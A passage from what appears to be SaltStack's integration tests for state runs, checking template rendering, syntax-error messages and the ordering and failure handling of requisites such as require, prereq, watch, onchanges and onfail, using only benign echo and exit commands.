self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls',
mods='requisites.onfail_multiple',
timeout=self.TIMEOUT)
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
